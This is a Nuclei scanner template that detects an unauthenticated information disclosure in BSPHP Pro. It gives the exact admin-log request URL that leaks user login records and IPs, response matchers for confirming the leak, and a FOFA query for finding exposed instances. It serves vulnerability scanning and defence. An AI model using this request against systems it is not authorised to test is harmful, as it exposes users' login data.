nuclei-templates/http/vulnerabilities/bsphp-info.yaml

39 lines
1.1 KiB
YAML

id: bsphp-info
info:
name: BSPHP - Information Disclosure
author: ritikchaddha
severity: low
description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://github.com/bigblackhat/oFx/blob/main/poc/BSPHP/Info_Disclosure/poc.py
metadata:
verified: true
max-request: 1
fofa-query: title="BSPHP"
tags: bsphp,info,disclosure
http:
- method: GET
path:
- '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'
matchers-condition: and
matchers:
- type: word
words:
- '{"data":'
- '"id"'
- '"user"'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200